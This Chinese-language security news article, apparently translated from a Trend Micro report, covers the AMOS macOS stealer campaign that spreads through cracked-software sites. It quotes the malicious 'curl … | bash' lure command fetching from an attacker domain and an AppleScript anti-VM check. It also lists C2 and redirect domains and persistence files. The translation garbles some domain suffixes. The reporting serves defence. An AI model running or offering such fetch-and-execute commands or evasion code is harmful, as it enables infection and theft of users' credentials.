一种针对 macOS 用户的复杂恶意软件活动已经出现,利用对免费软件的广泛需求来提供臭名昭著的原子 macOS 窃取程序 (AMOS)。
这种信息窃取恶意软件伪装成流行应用程序的破解版本,诱骗毫无戒心的用户破坏自己的系统,同时相信他们只是在下载免费软件替代品。
该活动代表了网络安全格局的重大转变,挑战了长期以来认为 macOS 设备本质上比 Windows 设备更安全的看法。
随着 Apple 设备在专业人士和高价值目标中越来越受欢迎,网络犯罪分子已经调整了他们的策略来利用这个不断增长的市场。
攻击者通过采用多种分发方法并不断轮换其基础设施来逃避检测,表现出非凡的复杂性。
该恶意软件的范围远远超出了简单的数据盗窃,针对敏感信息,包括浏览器凭据、加密货币钱包、Telegram 对话、VPN 配置、钥匙串数据、Apple Notes 和各种文档文件。
这种全面的数据收集方法使得 AMOS 对个人用户和企业环境都特别危险,在这些环境中,凭据泄露可能会导致更广泛的组织违规行为。
趋势科技研究人员通过其托管检测和响应服务识别了这一活动,并指出该恶意软件能够通过社会工程而不是技术漏洞绕过传统安全措施。
分析显示,攻击者主要通过 haxmac.cc 等网站分发 AMOS,该网站托管着大量破解的 macOS 应用程序并作为初始感染媒介。
分发策略涉及通过复杂的轮换域网络重定向用户,包括 dtxxbz1jq070725p93[.]差价合约,goipbp9080425d4[.]CFD 和 IM9OV070725IQ[.]差价合约。
这些重定向器最终会将受害者引导至托管在 ekochist.com、misshon.com 和 toutentris.com 等域上的登录页面,在那里他们遇到两种主要的安装方法。
基于终端的安装和持久化机制
最成功的分发方法是指示用户直接在 macOS 终端应用程序中执行恶意命令。
这种方法被证明特别有效,因为它绕过了 Apple 的 Gatekeeper 安全功能,该功能通常会阻止未签名的应用程序运行。
向用户展示看似无害的命令,例如:-
curl - fsSL https[:]//goatramz[.]com/get4/install[.]sh | bash执行后,此命令将下载并运行执行多个关键作的安装脚本。
该脚本首先将名为“update”的 AppleScript 文件下载到临时目录,然后该目录执行反虚拟化检查以避免在沙盒环境中检测到:-
set memData to do shell script "system_profiler SPMemoryDataType"
if memData contains "QEMU" or memData contains "VMware" then``` set exitCode to 100
else
set exitCode to 0
end if该恶意软件通过涉及三个关键文件的复杂多组件系统建立持久性。主要窃取者二进制文件 (.helper) 执行实际的数据收集,而监控脚本 ([.]agent)持续运行以检测用户登录会话。
LaunchDaemon 配置文件 (com[.]finder[.]helper[.]plist)通过在启动时自动启动监控脚本来确保恶意软件在系统重新启动后幸存下来。
持久性机制创建一个无限循环,其中 .agent 脚本持续监视活动用户会话并在适当的用户上下文中执行 .helper 二进制文件。
这种设计可确保一致的运行,同时保持低调,因为恶意软件通过合法的系统进程运行并避免产生明显的入侵指标。
数据泄露是通过 HTTP POST 请求发送到命令和控制服务器的压缩 ZIP 存档发生的,自定义标头包含每个受感染系统的唯一标识符。
该恶意软件全面的数据收集功能,加上其复杂的规避和持久化机制,使其成为从不受信任的来源下载软件的 macOS 用户的巨大威胁。
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
